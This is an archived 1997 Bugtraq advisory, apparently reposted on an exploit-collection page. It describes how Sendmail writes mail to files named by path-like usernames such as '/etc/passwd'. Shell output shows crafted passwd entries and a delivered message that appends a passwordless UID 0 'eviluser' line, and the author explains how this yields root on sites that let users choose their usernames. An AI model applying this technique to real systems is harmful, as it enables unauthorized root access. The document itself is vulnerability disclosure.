Sendmail file-as-username problem

Summary
Description:A quirk in Sendmail that could potentially be exploited is that usernames like '/etc/passwd' get written into the file of the same name when mail is received for them. This could be a problem on systems where users can specify their username without sysadmin intervention.
Author:Duck Vader <tiepilot@THEPOND.THEPOND.ML.ORG>
Compromise:Could potentially lead to root access
Vulnerable Systems:Mostly just BBSes or whatever systems allow users to specify a username and then create an /etc/passwd entry for them.
Date:2 December 1997
Details


Date: Tue, 2 Dec 1997 17:51:24 -0500
From: Duck Vader <tiepilot@THEPOND.THEPOND.ML.ORG>
To: BUGTRAQ@NETSPACE.ORG
Subject: Sendmail quirks

        Going through my mail the other day, I noticed some junk mail from
..@somehost, and wondered what would happen if I had a user by the same
name. Well, it seems sendmail will readily write to a path in the username
as long as it doesn't begin with a forward slash. A few quick examples:

thePond:~# cat /etc/passwd | grep ../
../../a:*:519:100:tmp:/home/tmp:/bin/tcsh
thePond:~# ls -l /var/a
-rw-------   1 ../../a  users           0 Nov 23 12:14 /var/a

thePond:/var/spool# ls -ld atjobs
drwxr-xr-x   2 root     root         1024 Nov 23 11:55 atjobs
thePond:/var/spool# cat /etc/passwd | grep atjobs
../atjobs:*:520:100:tmp:/tmp:/bin/tcsh
thePond:/var/spool# ls -l
total 16
drwxr-xr-x   2 root     root         1024 Nov 23 11:55 BOGUS.EYF
-rw-------   1 ../atjob users           0 Nov 23 12:20 atjobs

Yes, you can precede the pathname with a forward slash.
thePond:~# cat /etc/passwd | grep passwd
/etc/passwd:*:515:100:tmp:/home/tmp:
thePond:~# cat /etc/passwd
root:*:0:0:root:/root:/bin/tcsh
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
[Edited out more passwords..]
>From root Tue Nov 25 20:44:00 1997
To: /etc/passwd

eviluser::0:0:Sendmail quirks:/root:/bin/tcsh


        This probably will not be a problem for the average user. However,
BBSes and free email services often let the user select his own username,
and will add him to /etc/passwd for email and whatnot. If I ran into a
site that did this, I could just specify my login as /etc/passwd and write
myself a new username, this time with UID:GID 0:0 :)

                      *---------------------------------*
                      | tiepilot - The Duck Jedi Master |
                      |                                 |
                      |     duckvader@quackquack.com    |
                      |     tiepilot@thepentagon.com    |
                      *---------------------------------*

Never put off till tomorrow what you can avoid all together.

Hacker's Law:
        The belief that enhanced understanding will necessarily stir a
nation to action is one of mankind's oldest illusions.

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault